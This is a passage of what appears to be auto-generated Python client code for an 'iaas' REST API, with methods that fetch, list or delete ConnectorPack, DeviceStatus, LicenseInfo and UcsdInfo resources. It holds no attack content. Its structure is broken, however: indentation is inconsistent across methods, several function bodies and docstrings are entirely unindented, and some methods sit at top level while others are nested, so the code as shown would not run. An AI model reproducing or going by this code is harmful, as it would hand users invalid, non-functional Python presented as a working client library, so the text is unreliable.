    path_params = {}
    if 'moid' in local_var_params:
        path_params['Moid'] = local_var_params['moid']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501
    return self.api_client.call_api(
        '/iaas/UcsdInfos/{Moid}',
        'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get(
            '_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_iaas_connector_pack_by_moid(self, moid, **kwargs):  # noqa: E501
    """Read a 'iaas.ConnectorPack' resource. # noqa: E501

    The request is synchronous unless ``async_req=True`` is passed, in
    which case the request thread is returned instead of the result.

    >>> thread = api.get_iaas_connector_pack_by_moid(moid, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str moid: The unique Moid identifier of a resource instance. (required)
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             object without reading/decoding the response
                             data. Default is True.
    :param _request_timeout: total request timeout in seconds, or a
                             (connection, read) timeout tuple.
    :return: IaasConnectorPack
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this convenience wrapper only want the deserialized body,
    # so ask the low-level variant to drop the (status, headers) wrapper.
    kwargs['_return_http_data_only'] = True
    return self.get_iaas_connector_pack_by_moid_with_http_info(moid, **kwargs)  # noqa: E501
def get_iaas_connector_pack_by_moid_with_http_info(self, moid,
                                                   **kwargs):  # noqa: E501
    """Read a 'iaas.ConnectorPack' resource. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_iaas_connector_pack_by_moid_with_http_info(moid, async_req=True)
    >>> result = thread.get()
    :param async_req bool: execute request asynchronously
    :param str moid: The unique Moid identifier of a resource instance. (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(IaasConnectorPack, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously,
        returns the request thread.
    """
    # Snapshot the call's local names (self, moid, kwargs). Taken first so it
    # can serve below as a flat, mutable bag of request options.
    local_var_params = locals()
    # Keyword arguments this endpoint accepts via **kwargs.
    all_params = ['moid']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Reject unknown keyword arguments, folding known ones into the flat dict.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_iaas_connector_pack_by_moid" % key)
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'moid' is set
    if self.api_client.client_side_validation and (
            'moid' not in local_var_params or  # noqa: E501
            local_var_params['moid'] is None):  # noqa: E501
        raise ApiValueError(
            "Missing the required parameter `moid` when calling `get_iaas_connector_pack_by_moid`"
        )  # noqa: E501
    collection_formats = {}
    # 'Moid' is substituted into the {Moid} placeholder of the request path.
    path_params = {}
    if 'moid' in local_var_params:
        path_params['Moid'] = local_var_params['moid']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept([
        'application/json', 'text/csv',
        'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
    ])  # noqa: E501
    # Authentication setting
    auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501
    return self.api_client.call_api(
        '/iaas/ConnectorPacks/{Moid}',
        'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='IaasConnectorPack',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get(
            '_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_iaas_connector_pack_list(self, **kwargs):  # noqa: E501
    """Read a 'iaas.ConnectorPack' resource. # noqa: E501

    The request is synchronous unless ``async_req=True`` is passed, in
    which case the request thread is returned instead of the result.

    >>> thread = api.get_iaas_connector_pack_list(async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str filter: "$filter" predicate expression selecting the subset
        of resources to return; supports property references and string
        (single-quoted), numeric and boolean (true/false) literals.
    :param str orderby: properties used to sort the returned collection.
    :param int top: maximum number of resources to return in the response.
    :param int skip: number of resources to skip in the response.
    :param str select: subset of properties to return.
    :param str expand: additional attributes or related resources to return
        alongside the primary resources.
    :param str apply: "$apply" aggregation pipeline — a slash-separated
        sequence of set transformations ("aggregate" and "groupby"), each
        consuming the output of the previous one.
    :param bool count: return only the count of matching resources instead
        of the resources themselves.
    :param str inlinecount: request an inline count of matching resources
        to be included with the resources in the response.
    :param str at: like "$filter", but applied to versioning-information
        properties of the resources.
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding the response data. Default is True.
    :param _request_timeout: total request timeout in seconds, or a
        (connection, read) timeout tuple.
    :return: IaasConnectorPackList
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this convenience wrapper only want the deserialized body,
    # so ask the low-level variant to drop the (status, headers) wrapper.
    kwargs['_return_http_data_only'] = True
    return self.get_iaas_connector_pack_list_with_http_info(**kwargs)  # noqa: E501
    def get_iaas_connector_pack_list_with_http_info(self,
                                                    **kwargs):  # noqa: E501
        """Read a 'iaas.ConnectorPack' resource.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_iaas_connector_pack_list_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
        :param str orderby: Determines what properties are used to sort the collection of resources.
        :param int top: Specifies the maximum number of resources to return in the response.
        :param int skip: Specifies the number of resources to skip in the response.
        :param str select: Specifies a subset of properties to return.
        :param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
        :param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
        :param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
        :param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
        :param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(IaasConnectorPackList, status_code(int), headers(HTTPHeaderDict))
            If the method is called asynchronously,
            returns the request thread.
        """
        # NOTE: locals() is taken before any other local is bound so it
        # captures exactly {'self', 'kwargs'}; validated keyword arguments
        # are merged into this dict below and 'kwargs' is then removed.
        local_var_params = locals()

        # Query-parameter names accepted by this endpoint, plus the
        # framework-level options appended afterwards.
        all_params = [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
            'count', 'inlinecount', 'at'
        ]  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Reject any keyword argument this endpoint does not support.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError("Got an unexpected keyword argument '%s'"
                                   " to method get_iaas_connector_pack_list" %
                                   key)
            local_var_params[key] = val
        del local_var_params['kwargs']

        collection_formats = {}

        path_params = {}

        # Map each supplied keyword argument onto its OData-style
        # ($-prefixed) query parameter; None values are omitted.
        query_params = []
        if 'filter' in local_var_params and local_var_params[
                'filter'] is not None:  # noqa: E501
            query_params.append(
                ('$filter', local_var_params['filter']))  # noqa: E501
        if 'orderby' in local_var_params and local_var_params[
                'orderby'] is not None:  # noqa: E501
            query_params.append(
                ('$orderby', local_var_params['orderby']))  # noqa: E501
        if 'top' in local_var_params and local_var_params[
                'top'] is not None:  # noqa: E501
            query_params.append(
                ('$top', local_var_params['top']))  # noqa: E501
        if 'skip' in local_var_params and local_var_params[
                'skip'] is not None:  # noqa: E501
            query_params.append(
                ('$skip', local_var_params['skip']))  # noqa: E501
        if 'select' in local_var_params and local_var_params[
                'select'] is not None:  # noqa: E501
            query_params.append(
                ('$select', local_var_params['select']))  # noqa: E501
        if 'expand' in local_var_params and local_var_params[
                'expand'] is not None:  # noqa: E501
            query_params.append(
                ('$expand', local_var_params['expand']))  # noqa: E501
        if 'apply' in local_var_params and local_var_params[
                'apply'] is not None:  # noqa: E501
            query_params.append(
                ('$apply', local_var_params['apply']))  # noqa: E501
        if 'count' in local_var_params and local_var_params[
                'count'] is not None:  # noqa: E501
            query_params.append(
                ('$count', local_var_params['count']))  # noqa: E501
        if 'inlinecount' in local_var_params and local_var_params[
                'inlinecount'] is not None:  # noqa: E501
            query_params.append(
                ('$inlinecount',
                 local_var_params['inlinecount']))  # noqa: E501
        if 'at' in local_var_params and local_var_params[
                'at'] is not None:  # noqa: E501
            query_params.append(('at', local_var_params['at']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        # GET request: no request body is sent.
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept([
            'application/json', 'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ])  # noqa: E501

        # Authentication setting
        auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501

        # Delegate the HTTP exchange and response deserialization to the
        # shared ApiClient.
        return self.api_client.call_api(
            '/iaas/ConnectorPacks',
            'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IaasConnectorPackList',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get(
                '_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_iaas_device_status_by_moid(self, moid, **kwargs): # noqa: E501
"""Read a 'iaas.DeviceStatus' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_device_status_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasDeviceStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_device_status_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
    def get_iaas_device_status_by_moid_with_http_info(self, moid,
                                                      **kwargs):  # noqa: E501
        """Read a 'iaas.DeviceStatus' resource.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_iaas_device_status_by_moid_with_http_info(moid, async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param str moid: The unique Moid identifier of a resource instance. (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(IaasDeviceStatus, status_code(int), headers(HTTPHeaderDict))
            If the method is called asynchronously,
            returns the request thread.
        """
        # NOTE: locals() is taken before any other local is bound so it
        # captures exactly {'self', 'moid', 'kwargs'}; validated keyword
        # arguments are merged into this dict below.
        local_var_params = locals()

        all_params = ['moid']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Reject any keyword argument this endpoint does not support.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_iaas_device_status_by_moid" % key)
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'moid' is set
        if self.api_client.client_side_validation and (
                'moid' not in local_var_params or  # noqa: E501
                local_var_params['moid'] is None):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `moid` when calling `get_iaas_device_status_by_moid`"
            )  # noqa: E501

        collection_formats = {}

        # Fill the {Moid} placeholder of the path template.
        path_params = {}
        if 'moid' in local_var_params:
            path_params['Moid'] = local_var_params['moid']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # GET request: no request body is sent.
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept([
            'application/json', 'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ])  # noqa: E501

        # Authentication setting
        auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501

        # Delegate the HTTP exchange and response deserialization to the
        # shared ApiClient.
        return self.api_client.call_api(
            '/iaas/DeviceStatuses/{Moid}',
            'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IaasDeviceStatus',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get(
                '_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_iaas_device_status_list(self, **kwargs): # noqa: E501
"""Read a 'iaas.DeviceStatus' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_device_status_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasDeviceStatusList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_device_status_list_with_http_info(
**kwargs) # noqa: E501
    def get_iaas_device_status_list_with_http_info(self,
                                                   **kwargs):  # noqa: E501
        """Read a 'iaas.DeviceStatus' resource.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_iaas_device_status_list_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
        :param str orderby: Determines what properties are used to sort the collection of resources.
        :param int top: Specifies the maximum number of resources to return in the response.
        :param int skip: Specifies the number of resources to skip in the response.
        :param str select: Specifies a subset of properties to return.
        :param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
        :param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
        :param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
        :param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
        :param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(IaasDeviceStatusList, status_code(int), headers(HTTPHeaderDict))
            If the method is called asynchronously,
            returns the request thread.
        """
        # NOTE: locals() is taken before any other local is bound so it
        # captures exactly {'self', 'kwargs'}; validated keyword arguments
        # are merged into this dict below and 'kwargs' is then removed.
        local_var_params = locals()

        # Query-parameter names accepted by this endpoint, plus the
        # framework-level options appended afterwards.
        all_params = [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
            'count', 'inlinecount', 'at'
        ]  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Reject any keyword argument this endpoint does not support.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError("Got an unexpected keyword argument '%s'"
                                   " to method get_iaas_device_status_list" %
                                   key)
            local_var_params[key] = val
        del local_var_params['kwargs']

        collection_formats = {}

        path_params = {}

        # Map each supplied keyword argument onto its OData-style
        # ($-prefixed) query parameter; None values are omitted.
        query_params = []
        if 'filter' in local_var_params and local_var_params[
                'filter'] is not None:  # noqa: E501
            query_params.append(
                ('$filter', local_var_params['filter']))  # noqa: E501
        if 'orderby' in local_var_params and local_var_params[
                'orderby'] is not None:  # noqa: E501
            query_params.append(
                ('$orderby', local_var_params['orderby']))  # noqa: E501
        if 'top' in local_var_params and local_var_params[
                'top'] is not None:  # noqa: E501
            query_params.append(
                ('$top', local_var_params['top']))  # noqa: E501
        if 'skip' in local_var_params and local_var_params[
                'skip'] is not None:  # noqa: E501
            query_params.append(
                ('$skip', local_var_params['skip']))  # noqa: E501
        if 'select' in local_var_params and local_var_params[
                'select'] is not None:  # noqa: E501
            query_params.append(
                ('$select', local_var_params['select']))  # noqa: E501
        if 'expand' in local_var_params and local_var_params[
                'expand'] is not None:  # noqa: E501
            query_params.append(
                ('$expand', local_var_params['expand']))  # noqa: E501
        if 'apply' in local_var_params and local_var_params[
                'apply'] is not None:  # noqa: E501
            query_params.append(
                ('$apply', local_var_params['apply']))  # noqa: E501
        if 'count' in local_var_params and local_var_params[
                'count'] is not None:  # noqa: E501
            query_params.append(
                ('$count', local_var_params['count']))  # noqa: E501
        if 'inlinecount' in local_var_params and local_var_params[
                'inlinecount'] is not None:  # noqa: E501
            query_params.append(
                ('$inlinecount',
                 local_var_params['inlinecount']))  # noqa: E501
        if 'at' in local_var_params and local_var_params[
                'at'] is not None:  # noqa: E501
            query_params.append(('at', local_var_params['at']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        # GET request: no request body is sent.
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept([
            'application/json', 'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ])  # noqa: E501

        # Authentication setting
        auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501

        # Delegate the HTTP exchange and response deserialization to the
        # shared ApiClient.
        return self.api_client.call_api(
            '/iaas/DeviceStatuses',
            'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IaasDeviceStatusList',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get(
                '_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_iaas_license_info_by_moid(self, moid, **kwargs): # noqa: E501
"""Read a 'iaas.LicenseInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_license_info_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasLicenseInfo
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_license_info_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
    def get_iaas_license_info_by_moid_with_http_info(self, moid,
                                                     **kwargs):  # noqa: E501
        """Read a 'iaas.LicenseInfo' resource.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_iaas_license_info_by_moid_with_http_info(moid, async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param str moid: The unique Moid identifier of a resource instance. (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(IaasLicenseInfo, status_code(int), headers(HTTPHeaderDict))
            If the method is called asynchronously,
            returns the request thread.
        """
        # NOTE: locals() is taken before any other local is bound so it
        # captures exactly {'self', 'moid', 'kwargs'}; validated keyword
        # arguments are merged into this dict below.
        local_var_params = locals()

        all_params = ['moid']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Reject any keyword argument this endpoint does not support.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError("Got an unexpected keyword argument '%s'"
                                   " to method get_iaas_license_info_by_moid" %
                                   key)
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'moid' is set
        if self.api_client.client_side_validation and (
                'moid' not in local_var_params or  # noqa: E501
                local_var_params['moid'] is None):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `moid` when calling `get_iaas_license_info_by_moid`"
            )  # noqa: E501

        collection_formats = {}

        # Fill the {Moid} placeholder of the path template.
        path_params = {}
        if 'moid' in local_var_params:
            path_params['Moid'] = local_var_params['moid']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # GET request: no request body is sent.
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept([
            'application/json', 'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ])  # noqa: E501

        # Authentication setting
        auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501

        # Delegate the HTTP exchange and response deserialization to the
        # shared ApiClient.
        return self.api_client.call_api(
            '/iaas/LicenseInfos/{Moid}',
            'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IaasLicenseInfo',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get(
                '_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_iaas_license_info_list(self, **kwargs): # noqa: E501
"""Read a 'iaas.LicenseInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_license_info_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
